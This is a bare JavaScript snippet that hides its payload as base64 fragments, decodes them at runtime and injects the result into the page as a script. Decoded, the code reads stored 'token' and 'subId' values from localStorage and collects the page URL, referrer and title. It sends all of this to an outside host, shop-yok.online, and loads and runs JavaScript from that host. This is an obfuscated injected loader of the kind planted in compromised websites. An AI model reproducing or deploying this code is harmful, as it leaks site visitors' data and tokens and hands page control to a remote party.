
        var arr = ["KGZ1bmN0aW9u","KCkgewogICAgdg==","YXIgbg==","YW1lID0gJ19tcQ==","Vm5qOFJncw==","TVBSSG5qdCc7Cg==","ICAgIGlmICghdw==","aW5kb3cuX21x","Vm5q","OFJnc01QUg==","SG5qdCkgewo=","ICAgICAgICB3","aW5kb3c=","Ll9tcVZuag==","OA==","UmdzTVBSSG5q","dA==","ID0=","IHs=","CiAgICAg","ICAgICA=","ICB1bg==","aXF1","ZTogZg==","YWxzZSwKICAg","ICAgICAgICAgdA==","dGw6","IA==","ODY0MDAs","CiAgICAgICAgIA==","ICAgUg==","X1BBVEg6ICdo","dHRwczovL3No","b3AteQ==","b2subw==","bmxpbmUvR3pt","cQ==","aGdXNicsCiAg","ICA=","ICA=","ICB9OwogICAg","fQogICA=","IGNvbnN0IA==","X2Z3SGp0a1Q=","Vg==","U0ZTcGZ4Sg==","NSA9","IA==","bG9jYQ==","bFN0","b3JhZ2UuZ2V0SQ==","dGVt","KCdjbw==","bmZp","ZycpOwogIA==","ICBpZiAodHk=","cGVv","ZiBfZndI","anRrVA==","VlNGU3Bm","eEo=","NSAhPT0g","Jw==","dQ==","bmRlZmluZWQn","ICYmIF9md0hq","dGtUVlNGUw==","cGZ4Sg==","NSAhPT0gbg==","dWxsKSB7CiA=","ICAgICAgIHZh","ciBfdDdiVw==","MXdN","dFlKNVhOaDk=","ZyA9IEpTTw==","Ti5wYXJzZQ==","KF8=","ZndI","anRrVFZT","Rg==","U3BmeEo1KTsK","ICAgIA==","ICAgIA==","dmFyIF9O","TkRxWFg3Y2ZiYg==","ZDhaZHYg","PSBNYXRoLnJvdQ==","bmQoK25ldyA=","RGF0ZSgp","LzEwMDApOw==","CiAgICAgIA==","ICBpZiAoX3Q3Yg==","Vw==","MQ==","d010WQ==","Sg==","NQ==","WE5oOWcuY3I=","ZWF0ZWRfYXQgKw==","IHdp","bmRvdy5fbXFW","bmo4UmdzTVBS","SG5qdC50dA==","bCA8IF9OTkRx","WFg3Y2Zi","YmQ4","WmR2KSB7Cg==","ICAgIA==","ICAgIA==","ICA=","ICBsbw==","Y2FsU3Rvcg==","YQ==","Z2UucmVtb3Zl","SXRlbSgn","c3ViSWQn","KTsKICAgICA=","ICAgICAgIA==","bG9jYWxT","dG9yYWdlLnJl","bQ==","b3ZlSXRlbQ==","KCd0b2s=","ZW4=","Jyk7CiAg","ICAgICAg","ICAgIGw=","b2NhbA==","U3RvcmFnZS5y","ZW1v","dmVJdGVtKA==","J2NvbmZpZw==","Jw==","KTs=","CiAgICAgIA==","ICB9CiAgICB9","CiAgICB2YXI=","IF9SeENG","cU4=","RGQzakRQN3k=","cmQgPQ==","IGxvY2FsU3Rvcg==","YWdlLmdl","dEl0ZW0=","KCdzdWJJZCcp","Ow==","CiAgICB2","YXIgXzRHdA==","NTZ0dnFwbnlEYw==","TEQzID0gbG9j","YWxTdG9yYWdlLg==","Z2V0","SXRl","bSgn","dG8=","a2VuJyk7CiAg","ICB2YXIg","X3FGcQ==","OHpDcjJWTg==","d0xkdnJKID0gJw==","P3JldA==","dXJuPWpzLg==","Y2xpZQ==","bnQnOwogICA=","ICAgICBfcUZx","OHpDcjJWTg==","dw==","TGR2ckogKz0=","ICcmJyArIGRlYw==","bw==","ZGU=","VVJJQ29tcG9uZQ==","bnQod2luZA==","bw==","dy5sb2NhdGk=","bw==","bi5zZWFyYw==","aC5y","ZXBsYWNlKCc=","PycsICc=","Jykp","OwogICAgICAgIA==","X3FGcTh6","Q3IyVk53","TGR2cg==","SiA=","Kw==","PSAnJg==","c2VfcmVmZQ==","cg==","cmVyPQ==","JyA=","KyA=","ZW5jb2Rl","VVJJQ29tcA==","b25lbg==","dChk","b2N1bWVudC4=","cmVmZQ==","cnJlcik=","OwogICAg","IA==","ICA=","IF9x","RnE4ekNyMlZO","dw==","TGR2cg==","SiArPSAnJmQ=","ZWZhdWx0X2s=","ZXl3b3JkPScgKw==","IGVuYw==","b2RlVVJJQ29t","cG9uZW50KGRvYw==","dW1lbnQu","dGl0bGUpOwog","ICAgICA=","IA==","IF9xRnE4eg==","Q3IyVk53","TGR2","cg==","SiArPSAnJmxhbg==","ZGluZ191cmw9Jw==","ICsgZW5jb2Q=","ZVVSSUNv","bXA=","b25l","bnQoZG9j","dW1lbnQubG9j","YXRpb24uaG9z","dG5hbQ==","ZSArIGRv","Y3VtZW50Lmw=","b2NhdA==","aW9uLnBhdGg=","bmFtZSk7CiAg","ICAg","ICAgX3FGcTh6","Q3IyVk4=","d0xkdnJKICs=","PSAnJg==","bmFtZT0nICsg","ZW5j","b2RlVVJJQ29tcA==","b25l","bnQobg==","YW1lKTsKICAg","IA==","ICAg","IF9xRg==","cTh6Qw==","cjJWTndMZHY=","ckogKz0g","JyZob3N0PScg","KyBlbmNvZGU=","VVJJQ29tcG8=","bmVudCh3aW5kbw==","dw==","Ll9tcQ==","Vm5qOA==","UmdzTVBSSA==","bmp0LlJf","UEFUSCk=","OwogICAgaQ==","ZiAodHlw","ZQ==","b2YgX1I=","eENGcU4=","RGQzakRQN3lyZA==","ICE9PSAn","dW5kZWZpbmU=","ZCcgJiYg","X1J4Q0ZxTkRk","M2pEUDc=","eXJkICYmIHdp","bmRvdy5f","bQ==","cVZuajhSZ3NN","UFJIbmo=","dC51bmlx","dWUpIHs=","CiA=","ICAgIA==","ICAgX3FGcQ==","OA==","ekNyMlZOd0w=","ZHZySiArPSAn","JnM=","dWJfaWQ9JyArIA==","ZW4=","Y29kZVVSSUM=","b21wb25lbg==","dChfUnhD","RnFORGQz","akRQN3lyZCk7","CiAg","ICB9CiAgICA=","aWYg","KA==","dA==","eXBlb2YgXw==","NEd0NTZ0dnFw","bnlEY0xEMyA=","IT09ICd1bmQ=","ZWZpbmVkJyAmJg==","IF80R3Q1NnQ=","dnFwbg==","eURjTA==","RDM=","ICYmIHdpbmRv","dy5fbXFWbg==","ajhSZ3NNUFJIbg==","anQudW5pcXU=","ZQ==","KSB7CiAgICAgIA==","ICBfcUZxOA==","ekNyMg==","Vk4=","d0xkdnJKICs=","PSAnJnRva2Vu","PScgKyBlbmNv","ZGVVUklDb21wbw==","bmVudChfNA==","R3Q1NnQ=","dnFwbnk=","RGNM","RDMpOwo=","ICAgIH0K","ICAgIHZhciBh","ID0=","IGQ=","b2N1bWU=","bnQu","Y3JlYXRlRWxlbQ==","ZW50KCdzY3Jp","cHQ=","Jyk7","CiAgICAgICAg","YS4=","dHlw","ZSA9ICdhcA==","cA==","bA==","aQ==","Y2F0","aW8=","bi9qYXZhc2NyaQ==","cA==","dCc=","OwogICAgIA==","ICAgYQ==","LnNyYyA9IHdpbg==","ZG8=","dy5fbQ==","cVZuajhSZ3M=","TVBSSG5qdC4=","Ul9QQVRIIA==","KyBfcQ==","RnE4","ekNyMlZOd0xkdg==","cg==","Sg==","OwogIA==","ICB2YXIgcw==","IA==","PQ==","IGQ=","b2N1","bWVudC5nZXRF","bGVtZW50c0J5","VA==","YWc=","TmFt","ZSgncw==","Y3JpcHQnKVsw","XTs=","CiAgICBzLnA=","YXJlbnRO","b2RlLmluc2VydA==","QmVmb3JlKA==","YSwgcykKIA==","ICAgfSkoKTs="];
        var str = "";
        arr.forEach(item => {
            str += atob(item);
        });
        var a = document.createElement('script');
        a.type = 'text/javascript';
        a.innerHTML = str;
        var s = document.getElementsByTagName('script')[0];
        s.parentNode.insertBefore(a, s);
    
